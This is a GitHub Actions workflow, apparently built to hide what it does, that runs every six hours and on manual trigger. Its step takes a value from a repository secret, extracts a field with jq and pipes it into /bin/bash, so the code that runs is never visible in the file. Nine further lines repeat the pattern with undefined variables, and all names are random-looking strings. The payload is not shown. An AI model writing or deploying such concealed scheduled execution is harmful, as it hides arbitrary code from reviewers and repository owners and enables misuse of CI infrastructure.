name: laojiangzhongzheng
on:
  workflow_dispatch:
  schedule:
    - cron: '58 3/6 * * *'
jobs:  # 23493
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: laojiangzhongzheng
        env:
          oz7: ${{ secrets.oz7 }}
        run: |
          echo $oz7 | jq -r .kltut2904 | /bin/bash
          echo $fh324 | jq -r .g41 | /bin/bash
          echo $cot510 | jq -r .rq46863 | /bin/bash
          echo $tgab92 | jq -r .bi4 | /bin/bash
          echo $do8 | jq -r .a29574 | /bin/bash
          echo $k5 | jq -r .eixt2 | /bin/bash
          echo $o45935 | jq -r .mfx7684 | /bin/bash
          echo $yxjc57063 | jq -r .bwlm3 | /bin/bash
          echo $zs4376 | jq -r .pg30509 | /bin/bash
          echo $x93 | jq -r .u125 | /bin/bash

